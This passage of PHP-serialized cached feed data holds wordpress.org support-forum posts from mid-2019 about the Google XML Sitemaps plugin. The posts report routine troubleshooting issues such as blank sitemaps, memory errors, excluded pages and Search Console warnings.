5.2.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"https://wordpress.org/support/topic/cannot-update-google-xml-sitemaps-after-wordpress-is-upgraded-to-5-2-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 10 Jul 2019 01:52:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1016:\"\n						\n						<p>Replies: 1</p>\n						<p>Dear Sir</p>\n<p>We upgraded our WordPress from 4.8.1 to 5.2.2, and then we tried to update the Google XML Sitemaps plugin from 4.0.9 to 4.1.0.  But we got errors: Update Failed: &lt;!DOCTYPE html&gt; &lt;!&#8211; &#8230;&#8230;.<br />\nAfter a while, we tried and this time, it updated successfully, but we are still getting  blank sitemap.xml page.   We did click the two links in &#8220;Notify Search Engines about your sitemap or your main sitemap and all sub-sitemaps now.&#8221;</p>\n<p>We have another WordPress site on 4.8.1, and the sitemap.xml works fine.</p>\n<p>There is a post here that says the Google XML Sitemaps plugin is not compatible with the latest WP 5.2.x.  Is this true?<br />\n<a href=\"https://wordpress.org/support/topic/when-you-will-release-new-update-compatible-to-the-latest-wp-version-6/\" rel=\"nofollow\">https://wordpress.org/support/topic/when-you-will-release-new-update-compatible-to-the-latest-wp-version-6/</a></p>\n<p>Thank you</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"functioneer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"https://wordpress.org/support/topic/fatal-errors-when-using-query-monitor/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"fatal errors when using Query Monitor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"https://wordpress.org/support/topic/fatal-errors-when-using-query-monitor/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 09 Jul 2019 14:05:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1932:\"\n						\n						<p>Replies: 0</p>\n						<p>i&#8217;ve found many of these errors in debug.log:</p>\n<p>[09-Jul-2019 12:28:02 UTC] PHP Fatal error:  Allowed memory size of 4294967296 bytes exhausted (tried to allocate 2145402880 bytes) in /***/wp-content/plugins/google-sitemap-generator/sitemap-core.php on line 1737<br />\n[09-Jul-2019 12:28:02 UTC] PHP Fatal error:  Allowed memory size of 4294967296 bytes exhausted (tried to allocate 2145402880 bytes) in /***/wp-includes/functions.php on line 3437<br />\n[09-Jul-2019 12:28:02 UTC] PHP Fatal error:  Allowed memory size of 4294967296 bytes exhausted (tried to allocate 2145386490 bytes) in Unknown on line 0</p>\n<p>i thought it may be due to the 7600+ custom type posts + 100 between products, pages and posts. but then that doesn&#8217;t seem too big a number to me.</p>\n<p>i was considering adding an index <a href=\"https://www.wpintense.com/2019/02/04/performance-optimisation-for-various-xml-sitemap-plugins/\" rel=\"nofollow\">as suggested in this post</a>, but i didn&#8217;t really want to fiddle with database.</p>\n<p>i came across a support topic mentioning fatal errors when using a sitemap plugin at the same time as having enabled Query Monitor and that was it, disabling Query Monitor solves the issue.</p>\n<p>is there any workaround for using both plugins?</p>\n<p>if not, what&#8217;d be the best procedure for analysing site queries while sitemap is at work without breaking it?</p>\n<p><a href=\"https://wordpress.org/support/topic/fatal-errors-in-google-xml-sitemap/\" rel=\"nofollow\">same post on Query Monitor support</a></p>\n\n\n<ul id=\"bbp-topic-revision-log-11714516\" class=\"bbp-topic-revision-log\">\n\n	<li id=\"bbp-topic-revision-log-11714516-item-11714527\" class=\"bbp-topic-revision-log-item\">\n		This topic was modified 1 month, 2 weeks ago by <a href=\"https://wordpress.org/support/users/maxgx/\" title=\"View maxgx&#039;s profile\">maxgx</a>.\n	</li>\n\n</ul>\n\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"maxgx\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"https://wordpress.org/support/topic/problem-with-your-plugin-wpml-all-products-posts-pages-excluded/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"Problem with your plugin &amp;amp; WPML &amp;#8211; all products, posts &amp;amp; pages excluded!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"https://wordpress.org/support/topic/problem-with-your-plugin-wpml-all-products-posts-pages-excluded/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 05 Jul 2019 08:55:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:522:\"\n						\n						<p>Replies: 0</p>\n						<p>Hi.</p>\n<p>For some reason your plugin auto excludes all product pages, posts &amp; pages after a while. If I save settings without anything in the &#8220;Exclude posts&#8221; and check back after a couple days, the field is suddenly filled with all these product, post and pages ID:s. It doesn&#8217;t occur directly, as if I check after saving, the field is empty. So for some reason it is happening after some time.</p>\n<p>Any idea why and on how to solve this?</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"MikaelG\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/support/topic/old-sitemaps-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Old Sitemaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/support/topic/old-sitemaps-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 02 Jul 2019 12:02:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:219:\"\n						\n						<p>Replies: 0</p>\n						<p>Hi,</p>\n<p>Love this but, its showing old sitemaps way back to 2017 and not the latest?</p>\n<p>Any ideas what I am perhaps doing wrong please?</p>\n<p>Many Thanks</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Rik0399\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/support/topic/single-xml-sitemap-file/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"Single XML Sitemap File\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/support/topic/single-xml-sitemap-file/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 01 Jul 2019 20:34:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:384:\"\n						\n						<p>Replies: 1</p>\n						<p>We have a small site of ~500 URLs yet the plugin is breaking up our posts, pages, etc. across multiple sitemap files. Some of the sitemaps only contain two or three URLs within them. Is there a way to force the urls to a single sitemap file? It seems inefficient to need more than one file for such a small website. Thank you.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"pdanial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/support/topic/sitemap-doesnt-show-page-titles/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"Sitemap Doesn&amp;#8217;t show Page titles\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/support/topic/sitemap-doesnt-show-page-titles/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 28 Jun 2019 10:46:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:426:\"\n						\n						<p>Replies: 1</p>\n						<p>Hi Arne</p>\n<p>Probably a silly question but I see each post link shows as e.g. sitemap-pt-post-2019-05.xml and not a page title. I have just come from another sitemal to yours which shows posts as titles. May I ask if this is correct? i assumed it would be the page title which would help with SEO but if that was correct I&#8217;m sure the plugin would reflect that.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"itoni\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://wordpress.org/support/topic/google-console-warning-on-sitemap-html/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"Google console warning on Sitemap.html!!!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://wordpress.org/support/topic/google-console-warning-on-sitemap-html/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 23 Jun 2019 22:21:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:287:\"\n						\n						<p>Replies: 5</p>\n						<p>Getting a warning from Google Console saying Submitted URL marked ‘noindex’ for the Sitemap!</p>\n<p>The File that is noindexed is mysite.com/Sitemap.html</p>\n<p>Why is this happening? I have the latest version of this plugin.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Microcap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/support/topic/error-on-adding-sitemap-xml/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"&lt;span class=&quot;resolved&quot; aria-label=&quot;Resolved&quot; title=&quot;Topic is resolved.&quot;&gt;&lt;/span&gt;Error on adding Sitemap XML\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/support/topic/error-on-adding-sitemap-xml/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Jun 2019 18:35:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:702:\"\n						\n						<p>Replies: 4</p>\n						<p>Hello,</p>\n<p>I am trying to add a sitemap xml file to Google Webmaster Tools.</p>\n<p>I installed the plugin Google Sitemap XML into wordpress (XML Sitemap Generator for WordPress 4.1.0.)</p>\n<p>This is the URL the plugin provided me:<br />\nThe URL to your sitemap index file is: <a href=\"http://scouteats.com/sitemap.xml\" rel=\"nofollow\">http://scouteats.com/sitemap.xml</a></p>\n<p>When I pasted this url into the sitemap section of google webmaster tools, I received the following message:</p>\n<p>&#8220;Error<br />\nPlease enter a valid path to a sitemap in your site.&#8221;</p>\n<p>Can someone please help me get this fixed? </p>\n<p>Thank you</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"apriest\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wordpress.org/support/topic/cron-manager-sm_ping-single-event-in-queue/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"Cron Manager: sm_ping Single event In queue\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wordpress.org/support/topic/cron-manager-sm_ping-single-event-in-queue/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Jun 2019 15:32:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1051:\"\n						\n						<p>Replies: 0</p>\n						<p>Hello and thanks for your nice plugin!<br />\nFollowing issue is coming up since ..?</p>\n<p><strong>Plugin-Version 4.0.8  and the one before!</strong><br />\nproduces in <strong>Cron Manager</strong>: &#8220;sm_ping Single event In queue&#8221;, if triggerd manualy there is the message: &#8220;wrong_nounce&#8221;</p>\n<p><strong>Snitch</strong> (shows the protocol of all outgoing calls) quasi all second this is called:<br />\nTarget-URL:<br />\n<a href=\"http://www.google.com/webmasters/sitemaps/ping?sitemap=https%3A%2F%2Fw3punkt.de%2Fsitemap-pt-snitch-2019-06.xml\" rel=\"nofollow\">http://www.google.com/webmasters/sitemaps/ping?sitemap=https%3A%2F%2Fw3punkt.de%2Fsitemap-pt-snitch-2019-06.xml</a></p>\n<p>SourceFile:<br />\nPlugin: Google XML Sitemaps<br />\n/wp-content/plugins/google-sitemap-generator/sitemap-core.php:2042</p>\n<p>In the config. page there is: &#8220;error notifying bing&#8221; the aboth problems do not disapper if I disable calling bing.</p>\n<p>Do you have any sugguestions?</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Harald Wenzel\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/support/topic/sitemap-for-multi-language-website/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"Sitemap for multi language website\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/support/topic/sitemap-for-multi-language-website/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 16 Jun 2019 15:10:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:559:\"\n						\n						<p>Replies: 1</p>\n						<p>Hi all,</p>\n<p>is there any way to create two sitemaps for each of the language version of the website?</p>\n<p>We&#8217;re using WPML and the language versions are in subfolders, such as:</p>\n<p><a href=\"http://www.hunter.games/cs/\" rel=\"nofollow\">http://www.hunter.games/cs/</a><br />\n<a href=\"http://www.hunter.games/en/\" rel=\"nofollow\">http://www.hunter.games/en/</a></p>\n<p>So far, I managed to create only one sitemap for the Czech version, but not able to produce the English one.</p>\n<p>Thanks.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"steefgregor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://wordpress.org/support/topic/how-can-i-solve-or-fix-sitemap-error-for-my-site/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"How can I solve or fix sitemap error for my site?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://wordpress.org/support/topic/how-can-i-solve-or-fix-sitemap-error-for-my-site/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 13 Jun 2019 13:10:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:435:\"\n						\n						<p>Replies: 0</p>\n						<p>Hello Guys</p>\n<p>How can I solve or fix sitemap error for my site? My website is showing Error loading stylesheet: An unknown error has occurred (805303f4)</p>\n<p><a href=\"http://gyonlineng.com/sitemap.xml\" rel=\"nofollow\">http://gyonlineng.com/sitemap.xml</a></p>\n<p>Please, how can I solve this issue because it did not allow Google &amp; Bing to index my site on their bot? </p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"olayinka00\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:67:\"https://wordpress.org/support/plugin/google-sitemap-generator/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:8:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sat, 24 Aug 2019 21:51:57 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; 